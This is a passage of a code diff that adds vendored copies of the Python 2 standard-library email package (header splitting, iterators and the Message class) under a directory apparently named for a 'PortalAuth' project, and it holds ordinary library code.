if ch == ' ' and onfirstline and \
|
||||
len(this) == 1 and fcre.match(this[0]):
|
||||
this.append(part)
|
||||
linelen += partlen
|
||||
elif curlen + partlen > maxlen:
|
||||
if this:
|
||||
lines.append(joiner.join(this) + eol)
|
||||
# If this part is longer than maxlen and we aren't already
|
||||
# splitting on whitespace, try to recursively split this line
|
||||
# on whitespace.
|
||||
if partlen > maxlen and ch != ' ':
|
||||
subl = _split_ascii(part, maxlen, restlen,
|
||||
continuation_ws, ' ')
|
||||
lines.extend(subl[:-1])
|
||||
this = [subl[-1]]
|
||||
else:
|
||||
this = [part]
|
||||
linelen = wslen + len(this[-1])
|
||||
maxlen = restlen
|
||||
else:
|
||||
this.append(part)
|
||||
linelen += partlen
|
||||
# Put any left over parts on a line by themselves
|
||||
if this:
|
||||
lines.append(joiner.join(this))
|
||||
return lines
|
||||
|
||||
|
||||
|
||||
def _binsplit(splittable, charset, maxlinelen):
|
||||
i = 0
|
||||
j = len(splittable)
|
||||
while i < j:
|
||||
# Invariants:
|
||||
# 1. splittable[:k] fits for all k <= i (note that we *assume*,
|
||||
# at the start, that splittable[:0] fits).
|
||||
# 2. splittable[:k] does not fit for any k > j (at the start,
|
||||
# this means we shouldn't look at any k > len(splittable)).
|
||||
# 3. We don't know about splittable[:k] for k in i+1..j.
|
||||
# 4. We want to set i to the largest k that fits, with i <= k <= j.
|
||||
#
|
||||
m = (i+j+1) >> 1 # ceiling((i+j)/2); i < m <= j
|
||||
chunk = charset.from_splittable(splittable[:m], True)
|
||||
chunklen = charset.encoded_header_len(chunk)
|
||||
if chunklen <= maxlinelen:
|
||||
# m is acceptable, so is a new lower bound.
|
||||
i = m
|
||||
else:
|
||||
# m is not acceptable, so final i must be < m.
|
||||
j = m - 1
|
||||
# i == j. Invariant #1 implies that splittable[:i] fits, and
|
||||
# invariant #2 implies that splittable[:i+1] does not fit, so i
|
||||
# is what we're looking for.
|
||||
first = charset.from_splittable(splittable[:i], False)
|
||||
last = charset.from_splittable(splittable[i:], False)
|
||||
return first, last
|
||||
73
PortalAuth/includes/scripts/libs/email/iterators.py
Executable file
73
PortalAuth/includes/scripts/libs/email/iterators.py
Executable file
@@ -0,0 +1,73 @@
|
||||
# Copyright (C) 2001-2006 Python Software Foundation
|
||||
# Author: Barry Warsaw
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""Various types of useful iterators and generators."""
|
||||
|
||||
__all__ = [
|
||||
'body_line_iterator',
|
||||
'typed_subpart_iterator',
|
||||
'walk',
|
||||
# Do not include _structure() since it's part of the debugging API.
|
||||
]
|
||||
|
||||
import sys
|
||||
from cStringIO import StringIO
|
||||
|
||||
|
||||
|
||||
# This function will become a method of the Message class
|
||||
def walk(self):
|
||||
"""Walk over the message tree, yielding each subpart.
|
||||
|
||||
The walk is performed in depth-first order. This method is a
|
||||
generator.
|
||||
"""
|
||||
yield self
|
||||
if self.is_multipart():
|
||||
for subpart in self.get_payload():
|
||||
for subsubpart in subpart.walk():
|
||||
yield subsubpart
|
||||
|
||||
|
||||
|
||||
# These two functions are imported into the Iterators.py interface module.
|
||||
def body_line_iterator(msg, decode=False):
|
||||
"""Iterate over the parts, returning string payloads line-by-line.
|
||||
|
||||
Optional decode (default False) is passed through to .get_payload().
|
||||
"""
|
||||
for subpart in msg.walk():
|
||||
payload = subpart.get_payload(decode=decode)
|
||||
if isinstance(payload, basestring):
|
||||
for line in StringIO(payload):
|
||||
yield line
|
||||
|
||||
|
||||
def typed_subpart_iterator(msg, maintype='text', subtype=None):
|
||||
"""Iterate over the subparts with a given MIME type.
|
||||
|
||||
Use `maintype' as the main MIME type to match against; this defaults to
|
||||
"text". Optional `subtype' is the MIME subtype to match against; if
|
||||
omitted, only the main type is matched.
|
||||
"""
|
||||
for subpart in msg.walk():
|
||||
if subpart.get_content_maintype() == maintype:
|
||||
if subtype is None or subpart.get_content_subtype() == subtype:
|
||||
yield subpart
|
||||
|
||||
|
||||
|
||||
def _structure(msg, fp=None, level=0, include_default=False):
|
||||
"""A handy debugging aid"""
|
||||
if fp is None:
|
||||
fp = sys.stdout
|
||||
tab = ' ' * (level * 4)
|
||||
print >> fp, tab + msg.get_content_type(),
|
||||
if include_default:
|
||||
print >> fp, '[%s]' % msg.get_default_type()
|
||||
else:
|
||||
print >> fp
|
||||
if msg.is_multipart():
|
||||
for subpart in msg.get_payload():
|
||||
_structure(subpart, fp, level+1, include_default)
|
||||
BIN
PortalAuth/includes/scripts/libs/email/iterators.pyc
Executable file
BIN
PortalAuth/includes/scripts/libs/email/iterators.pyc
Executable file
Binary file not shown.
797
PortalAuth/includes/scripts/libs/email/message.py
Executable file
797
PortalAuth/includes/scripts/libs/email/message.py
Executable file
@@ -0,0 +1,797 @@
|
||||
# Copyright (C) 2001-2006 Python Software Foundation
|
||||
# Author: Barry Warsaw
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""Basic message object for the email package object model."""
|
||||
|
||||
__all__ = ['Message']
|
||||
|
||||
import re
|
||||
import uu
|
||||
import binascii
|
||||
import warnings
|
||||
from cStringIO import StringIO
|
||||
|
||||
# Intrapackage imports
|
||||
import email.charset
|
||||
from email import utils
|
||||
from email import errors
|
||||
|
||||
SEMISPACE = '; '
|
||||
|
||||
# Regular expression that matches `special' characters in parameters, the
|
||||
# existence of which force quoting of the parameter value.
|
||||
tspecials = re.compile(r'[ \(\)<>@,;:\\"/\[\]\?=]')
|
||||
|
||||
|
||||
# Helper functions
|
||||
def _splitparam(param):
|
||||
# Split header parameters. BAW: this may be too simple. It isn't
|
||||
# strictly RFC 2045 (section 5.1) compliant, but it catches most headers
|
||||
# found in the wild. We may eventually need a full fledged parser
|
||||
# eventually.
|
||||
a, sep, b = param.partition(';')
|
||||
if not sep:
|
||||
return a.strip(), None
|
||||
return a.strip(), b.strip()
|
||||
|
||||
def _formatparam(param, value=None, quote=True):
|
||||
"""Convenience function to format and return a key=value pair.
|
||||
|
||||
This will quote the value if needed or if quote is true. If value is a
|
||||
three tuple (charset, language, value), it will be encoded according
|
||||
to RFC2231 rules.
|
||||
"""
|
||||
if value is not None and len(value) > 0:
|
||||
# A tuple is used for RFC 2231 encoded parameter values where items
|
||||
# are (charset, language, value). charset is a string, not a Charset
|
||||
# instance.
|
||||
if isinstance(value, tuple):
|
||||
# Encode as per RFC 2231
|
||||
param += '*'
|
||||
value = utils.encode_rfc2231(value[2], value[0], value[1])
|
||||
# BAW: Please check this. I think that if quote is set it should
|
||||
# force quoting even if not necessary.
|
||||
if quote or tspecials.search(value):
|
||||
return '%s="%s"' % (param, utils.quote(value))
|
||||
else:
|
||||
return '%s=%s' % (param, value)
|
||||
else:
|
||||
return param
|
||||
|
||||
def _parseparam(s):
|
||||
plist = []
|
||||
while s[:1] == ';':
|
||||
s = s[1:]
|
||||
end = s.find(';')
|
||||
while end > 0 and (s.count('"', 0, end) - s.count('\\"', 0, end)) % 2:
|
||||
end = s.find(';', end + 1)
|
||||
if end < 0:
|
||||
end = len(s)
|
||||
f = s[:end]
|
||||
if '=' in f:
|
||||
i = f.index('=')
|
||||
f = f[:i].strip().lower() + '=' + f[i+1:].strip()
|
||||
plist.append(f.strip())
|
||||
s = s[end:]
|
||||
return plist
|
||||
|
||||
|
||||
def _unquotevalue(value):
|
||||
# This is different than utils.collapse_rfc2231_value() because it doesn't
|
||||
# try to convert the value to a unicode. Message.get_param() and
|
||||
# Message.get_params() are both currently defined to return the tuple in
|
||||
# the face of RFC 2231 parameters.
|
||||
if isinstance(value, tuple):
|
||||
return value[0], value[1], utils.unquote(value[2])
|
||||
else:
|
||||
return utils.unquote(value)
|
||||
|
||||
|
||||
|
||||
class Message:
|
||||
"""Basic message object.
|
||||
|
||||
A message object is defined as something that has a bunch of RFC 2822
|
||||
headers and a payload. It may optionally have an envelope header
|
||||
(a.k.a. Unix-From or From_ header). If the message is a container (i.e. a
|
||||
multipart or a message/rfc822), then the payload is a list of Message
|
||||
objects, otherwise it is a string.
|
||||
|
||||
Message objects implement part of the `mapping' interface, which assumes
|
||||
there is exactly one occurrence of the header per message. Some headers
|
||||
do in fact appear multiple times (e.g. Received) and for those headers,
|
||||
you must use the explicit API to set or get all the headers. Not all of
|
||||
the mapping methods are implemented.
|
||||
"""
|
||||
def __init__(self):
|
||||
self._headers = []
|
||||
self._unixfrom = None
|
||||
self._payload = None
|
||||
self._charset = None
|
||||
# Defaults for multipart messages
|
||||
self.preamble = self.epilogue = None
|
||||
self.defects = []
|
||||
# Default content type
|
||||
self._default_type = 'text/plain'
|
||||
|
||||
def __str__(self):
|
||||
"""Return the entire formatted message as a string.
|
||||
This includes the headers, body, and envelope header.
|
||||
"""
|
||||
return self.as_string(unixfrom=True)
|
||||
|
||||
def as_string(self, unixfrom=False):
|
||||
"""Return the entire formatted message as a string.
|
||||
Optional `unixfrom' when True, means include the Unix From_ envelope
|
||||
header.
|
||||
|
||||
This is a convenience method and may not generate the message exactly
|
||||
as you intend because by default it mangles lines that begin with
|
||||
"From ". For more flexibility, use the flatten() method of a
|
||||
Generator instance.
|
||||
"""
|
||||
from email.generator import Generator
|
||||
fp = StringIO()
|
||||
g = Generator(fp)
|
||||
g.flatten(self, unixfrom=unixfrom)
|
||||
return fp.getvalue()
|
||||
|
||||
def is_multipart(self):
|
||||
"""Return True if the message consists of multiple parts."""
|
||||
return isinstance(self._payload, list)
|
||||
|
||||
#
|
||||
# Unix From_ line
|
||||
#
|
||||
def set_unixfrom(self, unixfrom):
|
||||
self._unixfrom = unixfrom
|
||||
|
||||
def get_unixfrom(self):
|
||||
return self._unixfrom
|
||||
|
||||
#
|
||||
# Payload manipulation.
|
||||
#
|
||||
def attach(self, payload):
|
||||
"""Add the given payload to the current payload.
|
||||
|
||||
The current payload will always be a list of objects after this method
|
||||
is called. If you want to set the payload to a scalar object, use
|
||||
set_payload() instead.
|
||||
"""
|
||||
if self._payload is None:
|
||||
self._payload = [payload]
|
||||
else:
|
||||
self._payload.append(payload)
|
||||
|
||||
def get_payload(self, i=None, decode=False):
|
||||
"""Return a reference to the payload.
|
||||
|
||||
The payload will either be a list object or a string. If you mutate
|
||||
the list object, you modify the message's payload in place. Optional
|
||||
i returns that index into the payload.
|
||||
|
||||
Optional decode is a flag indicating whether the payload should be
|
||||
decoded or not, according to the Content-Transfer-Encoding header
|
||||
(default is False).
|
||||
|
||||
When True and the message is not a multipart, the payload will be
|
||||
decoded if this header's value is `quoted-printable' or `base64'. If
|
||||
some other encoding is used, or the header is missing, or if the
|
||||
payload has bogus data (i.e. bogus base64 or uuencoded data), the
|
||||
payload is returned as-is.
|
||||
|
||||
If the message is a multipart and the decode flag is True, then None
|
||||
is returned.
|
||||
"""
|
||||
if i is None:
|
||||
payload = self._payload
|
||||
elif not isinstance(self._payload, list):
|
||||
raise TypeError('Expected list, got %s' % type(self._payload))
|
||||
else:
|
||||
payload = self._payload[i]
|
||||
if decode:
|
||||
if self.is_multipart():
|
||||
return None
|
||||
cte = self.get('content-transfer-encoding', '').lower()
|
||||
if cte == 'quoted-printable':
|
||||
return utils._qdecode(payload)
|
||||
elif cte == 'base64':
|
||||
try:
|
||||
return utils._bdecode(payload)
|
||||
except binascii.Error:
|
||||
# Incorrect padding
|
||||
return payload
|
||||
elif cte in ('x-uuencode', 'uuencode', 'uue', 'x-uue'):
|
||||
sfp = StringIO()
|
||||
try:
|
||||
uu.decode(StringIO(payload+'\n'), sfp, quiet=True)
|
||||
payload = sfp.getvalue()
|
||||
except uu.Error:
|
||||
# Some decoding problem
|
||||
return payload
|
||||
# Everything else, including encodings with 8bit or 7bit are returned
|
||||
# unchanged.
|
||||
return payload
|
||||
|
||||
def set_payload(self, payload, charset=None):
|
||||
"""Set the payload to the given value.
|
||||
|
||||
Optional charset sets the message's default character set. See
|
||||
set_charset() for details.
|
||||
"""
|
||||
self._payload = payload
|
||||
if charset is not None:
|
||||
self.set_charset(charset)
|
||||
|
||||
def set_charset(self, charset):
|
||||
"""Set the charset of the payload to a given character set.
|
||||
|
||||
charset can be a Charset instance, a string naming a character set, or
|
||||
None. If it is a string it will be converted to a Charset instance.
|
||||
If charset is None, the charset parameter will be removed from the
|
||||
Content-Type field. Anything else will generate a TypeError.
|
||||
|
||||
The message will be assumed to be of type text/* encoded with
|
||||
charset.input_charset. It will be converted to charset.output_charset
|
||||
and encoded properly, if needed, when generating the plain text
|
||||
representation of the message. MIME headers (MIME-Version,
|
||||
Content-Type, Content-Transfer-Encoding) will be added as needed.
|
||||
|
||||
"""
|
||||
if charset is None:
|
||||
self.del_param('charset')
|
||||
self._charset = None
|
||||
return
|
||||
if isinstance(charset, basestring):
|
||||
charset = email.charset.Charset(charset)
|
||||
if not isinstance(charset, email.charset.Charset):
|
||||
raise TypeError(charset)
|
||||
# BAW: should we accept strings that can serve as arguments to the
|
||||
# Charset constructor?
|
||||
self._charset = charset
|
||||
if 'MIME-Version' not in self:
|
||||
self.add_header('MIME-Version', '1.0')
|
||||
if 'Content-Type' not in self:
|
||||
self.add_header('Content-Type', 'text/plain',
|
||||
charset=charset.get_output_charset())
|
||||
else:
|
||||
self.set_param('charset', charset.get_output_charset())
|
||||
if isinstance(self._payload, unicode):
|
||||
self._payload = self._payload.encode(charset.output_charset)
|
||||
if str(charset) != charset.get_output_charset():
|
||||
self._payload = charset.body_encode(self._payload)
|
||||
if 'Content-Transfer-Encoding' not in self:
|
||||
cte = charset.get_body_encoding()
|
||||
try:
|
||||
cte(self)
|
||||
except TypeError:
|
||||
self._payload = charset.body_encode(self._payload)
|
||||
self.add_header('Content-Transfer-Encoding', cte)
|
||||
|
||||
def get_charset(self):
|
||||
"""Return the Charset instance associated with the message's payload.
|
||||
"""
|
||||
return self._charset
|
||||
|
||||
#
|
||||
# MAPPING INTERFACE (partial)
|
||||
#
|
||||
def __len__(self):
|
||||
"""Return the total number of headers, including duplicates."""
|
||||
return len(self._headers)
|
||||
|
||||
def __getitem__(self, name):
|
||||
"""Get a header value.
|
||||
|
||||
Return None if the header is missing instead of raising an exception.
|
||||
|
||||
Note that if the header appeared multiple times, exactly which
|
||||
occurrence gets returned is undefined. Use get_all() to get all
|
||||
the values matching a header field name.
|
||||
"""
|
||||
return self.get(name)
|
||||
|
||||
def __setitem__(self, name, val):
|
||||
"""Set the value of a header.
|
||||
|
||||
Note: this does not overwrite an existing header with the same field
|
||||
name. Use __delitem__() first to delete any existing headers.
|
||||
"""
|
||||
self._headers.append((name, val))
|
||||
|
||||
def __delitem__(self, name):
|
||||
"""Delete all occurrences of a header, if present.
|
||||
|
||||
Does not raise an exception if the header is missing.
|
||||
"""
|
||||
name = name.lower()
|
||||
newheaders = []
|
||||
for k, v in self._headers:
|
||||
if k.lower() != name:
|
||||
newheaders.append((k, v))
|
||||
self._headers = newheaders
|
||||
|
||||
def __contains__(self, name):
|
||||
return name.lower() in [k.lower() for k, v in self._headers]
|
||||
|
||||
def has_key(self, name):
|
||||
"""Return true if the message contains the header."""
|
||||
missing = object()
|
||||
return self.get(name, missing) is not missing
|
||||
|
||||
def keys(self):
|
||||
"""Return a list of all the message's header field names.
|
||||
|
||||
These will be sorted in the order they appeared in the original
|
||||
message, or were added to the message, and may contain duplicates.
|
||||
Any fields deleted and re-inserted are always appended to the header
|
||||
list.
|
||||
"""
|
||||
return [k for k, v in self._headers]
|
||||
|
||||
def values(self):
|
||||
"""Return a list of all the message's header values.
|
||||
|
||||
These will be sorted in the order they appeared in the original
|
||||
message, or were added to the message, and may contain duplicates.
|
||||
Any fields deleted and re-inserted are always appended to the header
|
||||
list.
|
||||
"""
|
||||
return [v for k, v in self._headers]
|
||||
|
||||
def items(self):
|
||||
"""Get all the message's header fields and values.
|
||||
|
||||
These will be sorted in the order they appeared in the original
|
||||
message, or were added to the message, and may contain duplicates.
|
||||
Any fields deleted and re-inserted are always appended to the header
|
||||
list.
|
||||
"""
|
||||
return self._headers[:]
|
||||
|
||||
def get(self, name, failobj=None):
|
||||
"""Get a header value.
|
||||
|
||||
Like __getitem__() but return failobj instead of None when the field
|
||||
is missing.
|
||||
"""
|
||||
name = name.lower()
|
||||
for k, v in self._headers:
|
||||
if k.lower() == name:
|
||||
return v
|
||||
return failobj
|
||||
|
||||
#
|
||||
# Additional useful stuff
|
||||
#
|
||||
|
||||
def get_all(self, name, failobj=None):
|
||||
"""Return a list of all the values for the named field.
|
||||
|
||||
These will be sorted in the order they appeared in the original
|
||||
message, and may contain duplicates. Any fields deleted and
|
||||
re-inserted are always appended to the header list.
|
||||
|
||||
If no such fields exist, failobj is returned (defaults to None).
|
||||
"""
|
||||
values = []
|
||||
name = name.lower()
|
||||
for k, v in self._headers:
|
||||
if k.lower() == name:
|
||||
values.append(v)
|
||||
if not values:
|
||||
return failobj
|
||||
return values
|
||||
|
||||
def add_header(self, _name, _value, **_params):
|
||||
"""Extended header setting.
|
||||
|
||||
name is the header field to add. keyword arguments can be used to set
|
||||
additional parameters for the header field, with underscores converted
|
||||
to dashes. Normally the parameter will be added as key="value" unless
|
||||
value is None, in which case only the key will be added. If a
|
||||
parameter value contains non-ASCII characters it must be specified as a
|
||||
three-tuple of (charset, language, value), in which case it will be
|
||||
encoded according to RFC2231 rules.
|
||||
|
||||
Example:
|
||||
|
||||
msg.add_header('content-disposition', 'attachment', filename='bud.gif')
|
||||
"""
|
||||
parts = []
|
||||
for k, v in _params.items():
|
||||
if v is None:
|
||||
parts.append(k.replace('_', '-'))
|
||||
else:
|
||||
parts.append(_formatparam(k.replace('_', '-'), v))
|
||||
if _value is not None:
|
||||
parts.insert(0, _value)
|
||||
self._headers.append((_name, SEMISPACE.join(parts)))
|
||||
|
||||
def replace_header(self, _name, _value):
|
||||
"""Replace a header.
|
||||
|
||||
Replace the first matching header found in the message, retaining
|
||||
header order and case. If no matching header was found, a KeyError is
|
||||
raised.
|
||||
"""
|
||||
_name = _name.lower()
|
||||
for i, (k, v) in zip(range(len(self._headers)), self._headers):
|
||||
if k.lower() == _name:
|
||||
self._headers[i] = (k, _value)
|
||||
break
|
||||
else:
|
||||
raise KeyError(_name)
|
||||
|
||||
#
|
||||
# Use these three methods instead of the three above.
|
||||
#
|
||||
|
||||
def get_content_type(self):
|
||||
"""Return the message's content type.
|
||||
|
||||
The returned string is coerced to lower case of the form
|
||||
`maintype/subtype'. If there was no Content-Type header in the
|
||||
message, the default type as given by get_default_type() will be
|
||||
returned. Since according to RFC 2045, messages always have a default
|
||||
type this will always return a value.
|
||||
|
||||
RFC 2045 defines a message's default type to be text/plain unless it
|
||||
appears inside a multipart/digest container, in which case it would be
|
||||
message/rfc822.
|
||||
"""
|
||||
missing = object()
|
||||
value = self.get('content-type', missing)
|
||||
if value is missing:
|
||||
# This should have no parameters
|
||||
return self.get_default_type()
|
||||
ctype = _splitparam(value)[0].lower()
|
||||
# RFC 2045, section 5.2 says if its invalid, use text/plain
|
||||
if ctype.count('/') != 1:
|
||||
return 'text/plain'
|
||||
return ctype
|
||||
|
||||
def get_content_maintype(self):
|
||||
"""Return the message's main content type.
|
||||
|
||||
This is the `maintype' part of the string returned by
|
||||
get_content_type().
|
||||
"""
|
||||
ctype = self.get_content_type()
|
||||
return ctype.split('/')[0]
|
||||
|
||||
def get_content_subtype(self):
|
||||
"""Returns the message's sub-content type.
|
||||
|
||||
This is the `subtype' part of the string returned by
|
||||
get_content_type().
|
||||
"""
|
||||
ctype = self.get_content_type()
|
||||
return ctype.split('/')[1]
|
||||
|
||||
def get_default_type(self):
|
||||
"""Return the `default' content type.
|
||||
|
||||
Most messages have a default content type of text/plain, except for
|
||||
messages that are subparts of multipart/digest containers. Such
|
||||
subparts have a default content type of message/rfc822.
|
||||
"""
|
||||
return self._default_type
|
||||
|
||||
def set_default_type(self, ctype):
|
||||
"""Set the `default' content type.
|
||||
|
||||
ctype should be either "text/plain" or "message/rfc822", although this
|
||||
is not enforced. The default content type is not stored in the
|
||||
Content-Type header.
|
||||
"""
|
||||
self._default_type = ctype
|
||||
|
||||
def _get_params_preserve(self, failobj, header):
|
||||
# Like get_params() but preserves the quoting of values. BAW:
|
||||
# should this be part of the public interface?
|
||||
missing = object()
|
||||
value = self.get(header, missing)
|
||||
if value is missing:
|
||||
return failobj
|
||||
params = []
|
||||
for p in _parseparam(';' + value):
|
||||
try:
|
||||
name, val = p.split('=', 1)
|
||||
name = name.strip()
|
||||
val = val.strip()
|
||||
except ValueError:
|
||||
# Must have been a bare attribute
|
||||
name = p.strip()
|
||||
val = ''
|
||||
params.append((name, val))
|
||||
params = utils.decode_params(params)
|
||||
return params
|
||||
|
||||
def get_params(self, failobj=None, header='content-type', unquote=True):
|
||||
"""Return the message's Content-Type parameters, as a list.
|
||||
|
||||
The elements of the returned list are 2-tuples of key/value pairs, as
|
||||
split on the `=' sign. The left hand side of the `=' is the key,
|
||||
while the right hand side is the value. If there is no `=' sign in
|
||||
the parameter the value is the empty string. The value is as
|
||||
described in the get_param() method.
|
||||
|
||||
Optional failobj is the object to return if there is no Content-Type
|
||||
header. Optional header is the header to search instead of
|
||||
Content-Type. If unquote is True, the value is unquoted.
|
||||
"""
|
||||
missing = object()
|
||||
params = self._get_params_preserve(missing, header)
|
||||
if params is missing:
|
||||
return failobj
|
||||
if unquote:
|
||||
return [(k, _unquotevalue(v)) for k, v in params]
|
||||
else:
|
||||
return params
|
||||
|
||||
def get_param(self, param, failobj=None, header='content-type',
|
||||
unquote=True):
|
||||
"""Return the parameter value if found in the Content-Type header.
|
||||
|
||||
Optional failobj is the object to return if there is no Content-Type
|
||||
header, or the Content-Type header has no such parameter. Optional
|
||||
header is the header to search instead of Content-Type.
|
||||
|
||||
Parameter keys are always compared case insensitively. The return
|
||||
value can either be a string, or a 3-tuple if the parameter was RFC
|
||||
2231 encoded. When it's a 3-tuple, the elements of the value are of
|
||||
the form (CHARSET, LANGUAGE, VALUE). Note that both CHARSET and
|
||||
LANGUAGE can be None, in which case you should consider VALUE to be
|
||||
encoded in the us-ascii charset. You can usually ignore LANGUAGE.
|
||||
|
||||
Your application should be prepared to deal with 3-tuple return
|
||||
values, and can convert the parameter to a Unicode string like so:
|
||||
|
||||
param = msg.get_param('foo')
|
||||
if isinstance(param, tuple):
|
||||
param = unicode(param[2], param[0] or 'us-ascii')
|
||||
|
||||
In any case, the parameter value (either the returned string, or the
|
||||
VALUE item in the 3-tuple) is always unquoted, unless unquote is set
|
||||
to False.
|
||||
"""
|
||||
if header not in self:
|
||||
return failobj
|
||||
for k, v in self._get_params_preserve(failobj, header):
|
||||
if k.lower() == param.lower():
|
||||
if unquote:
|
||||
return _unquotevalue(v)
|
||||
else:
|
||||
return v
|
||||
return failobj
|
||||
|
||||
def set_param(self, param, value, header='Content-Type', requote=True,
|
||||
charset=None, language=''):
|
||||
"""Set a parameter in the Content-Type header.
|
||||
|
||||
If the parameter already exists in the header, its value will be
|
||||
replaced with the new value.
|
||||
|
||||
If header is Content-Type and has not yet been defined for this
|
||||
message, it will be set to "text/plain" and the new parameter and
|
||||
value will be appended as per RFC 2045.
|
||||
|
||||
An alternate header can specified in the header argument, and all
|
||||
parameters will be quoted as necessary unless requote is False.
|
||||
|
||||
If charset is specified, the parameter will be encoded according to RFC
|
||||
2231. Optional language specifies the RFC 2231 language, defaulting
|
||||
to the empty string. Both charset and language should be strings.
|
||||
"""
|
||||
if not isinstance(value, tuple) and charset:
|
||||
value = (charset, language, value)
|
||||
|
||||
if header not in self and header.lower() == 'content-type':
|
||||
ctype = 'text/plain'
|
||||
else:
|
||||
ctype = self.get(header)
|
||||
if not self.get_param(param, header=header):
|
||||
if not ctype:
|
||||
ctype = _formatparam(param, value, requote)
|
||||
else:
|
||||
ctype = SEMISPACE.join(
|
||||
[ctype, _formatparam(param, value, requote)])
|
||||
else:
|
||||
ctype = ''
|
||||
for old_param, old_value in self.get_params(header=header,
|
||||
unquote=requote):
|
||||
append_param = ''
|
||||
if old_param.lower() == param.lower():
|
||||
append_param = _formatparam(param, value, requote)
|
||||
else:
|
||||
append_param = _formatparam(old_param, old_value, requote)
|
||||
if not ctype:
|
||||
ctype = append_param
|
||||
else:
|
||||
ctype = SEMISPACE.join([ctype, append_param])
|
||||
if ctype != self.get(header):
|
||||
del self[header]
|
||||
self[header] = ctype
|
||||
|
||||
def del_param(self, param, header='content-type', requote=True):
|
||||
"""Remove the given parameter completely from the Content-Type header.
|
||||
|
||||
The header will be re-written in place without the parameter or its
|
||||
value. All values will be quoted as necessary unless requote is
|
||||
False. Optional header specifies an alternative to the Content-Type
|
||||
header.
|
||||
"""
|
||||
if header not in self:
|
||||
return
|
||||
new_ctype = ''
|
||||
for p, v in self.get_params(header=header, unquote=requote):
|
||||
if p.lower() != param.lower():
|
||||
if not new_ctype:
|
||||
new_ctype = _formatparam(p, v, requote)
|
||||
else:
|
||||
new_ctype = SEMISPACE.join([new_ctype,
|
||||
_formatparam(p, v, requote)])
|
||||
if new_ctype != self.get(header):
|
||||
del self[header]
|
||||
self[header] = new_ctype
|
||||
|
||||
def set_type(self, type, header='Content-Type', requote=True):
|
||||
"""Set the main type and subtype for the Content-Type header.
|
||||
|
||||
type must be a string in the form "maintype/subtype", otherwise a
|
||||
ValueError is raised.
|
||||
|
||||
This method replaces the Content-Type header, keeping all the
|
||||
parameters in place. If requote is False, this leaves the existing
|
||||
header's quoting as is. Otherwise, the parameters will be quoted (the
|
||||
default).
|
||||
|
||||
An alternative header can be specified in the header argument. When
|
||||
the Content-Type header is set, we'll always also add a MIME-Version
|
||||
header.
|
||||
"""
|
||||
# BAW: should we be strict?
|
||||
if not type.count('/') == 1:
|
||||
raise ValueError
|
||||
# Set the Content-Type, you get a MIME-Version
|
||||
if header.lower() == 'content-type':
|
||||
del self['mime-version']
|
||||
self['MIME-Version'] = '1.0'
|
||||
if header not in self:
|
||||
self[header] = type
|
||||
return
|
||||
params = self.get_params(header=header, unquote=requote)
|
||||
del self[header]
|
||||
self[header] = type
|
||||
# Skip the first param; it's the old type.
|
||||
for p, v in params[1:]:
|
||||
self.set_param(p, v, header, requote)
|
||||
|
||||
def get_filename(self, failobj=None):
|
||||
"""Return the filename associated with the payload if present.
|
||||
|
||||
The filename is extracted from the Content-Disposition header's
|
||||
`filename' parameter, and it is unquoted. If that header is missing
|
||||
the `filename' parameter, this method falls back to looking for the
|
||||
`name' parameter.
|
||||
"""
|
||||
missing = object()
|
||||
filename = self.get_param('filename', missing, 'content-disposition')
|
||||
if filename is missing:
|
||||
filename = self.get_param('name', missing, 'content-type')
|
||||
if filename is missing:
|
||||
return failobj
|
||||
return utils.collapse_rfc2231_value(filename).strip()
|
||||
|
||||
def get_boundary(self, failobj=None):
|
||||
"""Return the boundary associated with the payload if present.
|
||||
|
||||
The boundary is extracted from the Content-Type header's `boundary'
|
||||
parameter, and it is unquoted.
|
||||
"""
|
||||
missing = object()
|
||||
boundary = self.get_param('boundary', missing)
|
||||
if boundary is missing:
|
||||
return failobj
|
||||
# RFC 2046 says that boundaries may begin but not end in w/s
|
||||
return utils.collapse_rfc2231_value(boundary).rstrip()
|
||||
|
||||
def set_boundary(self, boundary):
|
||||
"""Set the boundary parameter in Content-Type to 'boundary'.
|
||||
|
||||
This is subtly different than deleting the Content-Type header and
|
||||
adding a new one with a new boundary parameter via add_header(). The
|
||||
main difference is that using the set_boundary() method preserves the
|
||||
order of the Content-Type header in the original message.
|
||||
|
||||
HeaderParseError is raised if the message has no Content-Type header.
|
||||
"""
|
||||
missing = object()
|
||||
params = self._get_params_preserve(missing, 'content-type')
|
||||
if params is missing:
|
||||
# There was no Content-Type header, and we don't know what type
|
||||
# to set it to, so raise an exception.
|
||||
raise errors.HeaderParseError('No Content-Type header found')
|
||||
newparams = []
|
||||
foundp = False
|
||||
for pk, pv in params:
|
||||
if pk.lower() == 'boundary':
|
||||
newparams.append(('boundary', '"%s"' % boundary))
|
||||
foundp = True
|
||||
else:
|
||||
newparams.append((pk, pv))
|
||||
if not foundp:
|
||||
# The original Content-Type header had no boundary attribute.
|
||||
# Tack one on the end. BAW: should we raise an exception
|
||||
# instead???
|
||||
newparams.append(('boundary', '"%s"' % boundary))
|
||||
# Replace the existing Content-Type header with the new value
|
||||
newheaders = []
|
||||
for h, v in self._headers:
|
||||
if h.lower() == 'content-type':
|
||||
parts = []
|
||||
for k, v in newparams:
|
||||
if v == '':
|
||||
parts.append(k)
|
||||
else:
|
||||
parts.append('%s=%s' % (k, v))
|
||||
newheaders.append((h, SEMISPACE.join(parts)))
|
||||
|
||||
else:
|
||||
newheaders.append((h, v))
|
||||
self._headers = newheaders
|
||||
|
||||
def get_content_charset(self, failobj=None):
|
||||
"""Return the charset parameter of the Content-Type header.
|
||||
|
||||
The returned string is always coerced to lower case. If there is no
|
||||
Content-Type header, or if that header has no charset parameter,
|
||||
failobj is returned.
|
||||
"""
|
||||
missing = object()
|
||||
charset = self.get_param('charset', missing)
|
||||
if charset is missing:
|
||||
return failobj
|
||||
if isinstance(charset, tuple):
|
||||
# RFC 2231 encoded, so decode it, and it better end up as ascii.
|
||||
pcharset = charset[0] or 'us-ascii'
|
||||
try:
|
||||
# LookupError will be raised if the charset isn't known to
|
||||
# Python. UnicodeError will be raised if the encoded text
|
||||
# contains a character not in the charset.
|
||||
charset = unicode(charset[2], pcharset).encode('us-ascii')
|
||||
except (LookupError, UnicodeError):
|
||||
charset = charset[2]
|
||||
# charset character must be in us-ascii range
|
||||
try:
|
||||
if isinstance(charset, str):
|
||||
charset = unicode(charset, 'us-ascii')
|
||||
charset = charset.encode('us-ascii')
|
||||
except UnicodeError:
|
||||
return failobj
|
||||
# RFC 2046, $4.1.2 says charsets are not case sensitive
|
||||
return charset.lower()
|
||||
|
||||
def get_charsets(self, failobj=None):
|
||||
